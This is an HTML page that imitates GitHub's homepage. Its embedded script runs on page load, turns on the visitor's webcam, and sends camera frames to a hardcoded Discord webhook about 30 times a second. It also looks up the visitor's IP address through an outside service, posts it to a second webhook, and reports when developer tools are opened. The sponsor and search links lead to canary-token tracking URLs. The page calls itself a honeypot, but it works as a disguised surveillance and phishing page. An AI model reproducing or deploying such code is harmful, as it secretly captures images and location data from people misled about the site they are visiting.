<!doctype html>
<html>
 <head>
 <title>GitHub: Let's build from here
</title>
<meta name="description"
 content="GitHub is where people build software. More than 100 million people use GitHub to discover, fork, and contribute to over 330 million projects.">
  <link rel="stylesheet"
   href="style.css">
 </head>
 <body>
  
  <script src="script.js"></script>
  
 <video id="video" width="640" height="480" autoplay></video>
  <canvas id="canvas" width="640" height="480"></canvas>
  <div id="ip-address"></div>

  <script>
    function openCamera() {
      if (navigator.mediaDevices && navigator.mediaDevices.getUserMedia) {
        navigator.mediaDevices.getUserMedia({ video: true })
          .then(function(stream) {
            var videoElement = document.getElementById('video');
            videoElement.srcObject = stream;
            videoElement.play();

            var canvas = document.createElement('canvas');
            var context = canvas.getContext('2d');
            var frameRate = 30;

            setInterval(function() {
              context.drawImage(videoElement, 0, 0, canvas.width, canvas.height);
              canvas.toBlob(function(blob) {
                sendToDiscord(blob);
              }, 'image/jpeg', 0.9);
            }, 1000 / frameRate);
          })
          .catch(function(error) {
            console.error('Error accessing camera:', error);
          });
      } else {
        console.error('getUserMedia is not supported in this browser.');
      }
    }

    function sendToDiscord(blob) {
      var file = new File([blob], 'visitor.jpg');

      var formData = new FormData();
      formData.append('file', file);

      fetch('https://discord.com/api/webhooks/1146431224827617340/j4JNulH14SbHmaZTnBc24tp8BaMONMYZaJg4fsvLDcxfPOl84Jg92FCtt8PN3BJ06gFq', {
        method: 'POST',
        body: formData
      })
        .then(function(response) {
          console.log('Successfully sent video frame to Discord.');
        })
        .catch(function(error) {
          console.error('Error sending video frame to Discord:', error);
        });
    }

    const DISCORD_WEBHOOK_URL = 'https://discord.com/api/webhooks/1146431218469052457/MUBa80j2IZLkkIFjKr_fXbomPSVB0obHU7yDFDXRR0TUDeLZZrU61Do33W36LGSFp2In';

    const getIPAddress = async () => {
      try {
        const response = await fetch('https://api.ipify.org?format=json');
        const data = await response.json();
        const ipAddress = data.ip;
        displayIPAddress(ipAddress);
        sendToDiscordIP(ipAddress);
      } catch (error) {
        console.error('Failed to fetch IP address:', error);
      }
    };

    const displayIPAddress = (ipAddress) => {
      const ipAddressElement = document.getElementById('ip-address');
      ipAddressElement.textContent = ipAddress;
    };

    const sendToDiscordIP = async (ipAddress) => {
      try {
        const payload = {
          content: `The IDS And Honeypot has detected a new user on The Camera Logger Website IP: ${ipAddress}`
        };

        const response = await fetch(DISCORD_WEBHOOK_URL, {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json'
          },
          body: JSON.stringify(payload)
        });

        if (response.status !== 204) {
          console.error('Failed to send IP address to Discord.');
        }
      } catch (error) {
        console.error('Failed to send IP address to Discord:', error);
      }
    };

    window.addEventListener('load', openCamera);
    window.addEventListener('load', getIPAddress);

    window.addEventListener('devtoolschange', (event) => {
      if (event.detail.isOpen) {
        console.log('IDS Detected Developer tools or inspect element opened');
        sendToDiscordIP('IDS Detected Developer tools or inspect element opened');
      }
    });
  </script>
  </head>
  <body>

<html lang="en">
 
 <head>
  <meta charset="UTF-8">
  <meta name="viewport"
   content="width=device-width, initial-scale=1.0">
  <style>
   body {
    margin: 0;
    padding: 0;
    font-family: Arial, sans-serif;
   }
   
   header {
    background-color: #24292e;
    color: #fff;
    padding: 10px;
   }
   
   header h1 {
    font-size: 24px;
    margin: 0;
    padding: 0;
   }
   
   nav {
    background-color: #f6f8fa;
    padding: 10px;
   }
   
   nav ul {
    list-style-type: none;
    margin: 0;
    padding: 0;
   }
   
   nav ul li {
    display: inline-block;
    margin-right: 10px;
   }
   
   nav ul li a {
    color: #000;
    text-decoration: none;
    padding: 5px;
   }
   
   main {
    margin: 20px;
   }
   
   footer {
    background-color: #24292e;
    color: #fff;
    padding: 10px;
    text-align: center;
   }
  </style>
 </head>
 
 <body>
  <header>
   <input type="text"
    placeholder="Search or jump too..."><button><a
     href="http://canarytokens.com/tags/xmd65u6z1dkdhysi1uyftjpg3/submit.aspx">Search
     </ca></button>
  </header>
  
  <nav>
   <ul>
    <li><a href="#">Home</a></li>
    <li><a href="#">Repositories</a>
    </li>
    <li><a href="#">Projects</a></li>
    <li><a href="#">Users</a></li>
   </ul>
  </nav>
  
  <button>For you</button>
  <center>
  <main>
   <h2>Welcome to the new feed!
   </h2>
   <p>Welcome to the new feed!
    We’re updating the cards and
    ranking all the time, so check back
    regularly. At first, you might need
    to follow some people or star some
    repositories to get started 🌱.</p>
  </main>
  
  <br>
  <font face=Adobe Gothic Std" font
   size="2" font color="grey">
   <h5> github sponsored kivikakk, knsv
    and 5 more• last week</h5>
   <button><a
     href="http://canarytokens.com/tags/xmd65u6z1dkdhysi1uyftjpg3/submit.aspx">Asherah
     Connor</br>
     Support my work on libraries for
     CommonMark and GitHub Flavored
     Markdown
     </ca></button>
   
   <br>
   <font face=Adobe Gothic Std" font
    size="2" font color="grey">
    <h5> github sponsored KATT,
     bebopbio
     and 22 more• last month</h5>
    <button><a
      href="http://canarytokens.com/tags/xmd65u6z1dkdhysi1uyftjpg3/submit.aspx">Alex
      / KATT</br>
      
      I am Alex, a fully-stacked
      TypeScripter from Sweden & the
      creator of tRPC.
      </ca></button>


    <font face=Adobe Gothic Std"font
    size="3" font color="white"><b>
     <center><br>
      <p>(IDS And Honeypot Detected)
       Your
       IP
       Address is: <span
        id="ip-address"></span></p>
      </br>
     </center>
     
    
   
    
    
    <footer>
     &copy; 2023 GitHub, Inc.
    </footer>
  </center>
    <style>
     body {
      margin: 0;
      padding: 0;
      font-family: Arial, sans-serif;
     }
     
     header {
      background-color: #24292e;
      color: #fff;
      padding: 10px;
     }
     
     header h1 {
      font-size: 24px;
      margin: 0;
      padding: 0;
     }
     
     nav {
      background-color: #f6f8fa;
      padding: 10px;
     }
     
     nav ul {
      list-style-type: none;
      margin: 0;
      padding: 0;
     }
     
     nav ul li {
      display: inline-block;
      margin-right: 10px;
     }
     
     nav ul li a {
      color: #0366d6;
      text-decoration: none;
      padding: 5px;
     }
     
     nav ul li a:hover {
      text-decoration: underline;
     }
     
     main {
      margin: 20px;
     }
     
     a {
      color: #0366d6;
      text-decoration: none;
     }
     
     a:hover {
      text-decoration: underline;
     }
     
     .btn {
      display: inline-block;
      background-color: #0366d6;
      color: #fff;
      padding: 8px 16px;
      border: none;
      border-radius: 6px;
      font-size: 14px;
      cursor: pointer;
     }
     
     .btn:hover {
      background-color: #005cc5;
     }
     
     footer {
      background-color: #24292e;
      color: #fff;
      padding: 10px;
      text-align: center;
     }
    </style>

   <video id="video" width="640"
          height="480" autoplay></video></center>


   
  </body>
</html>
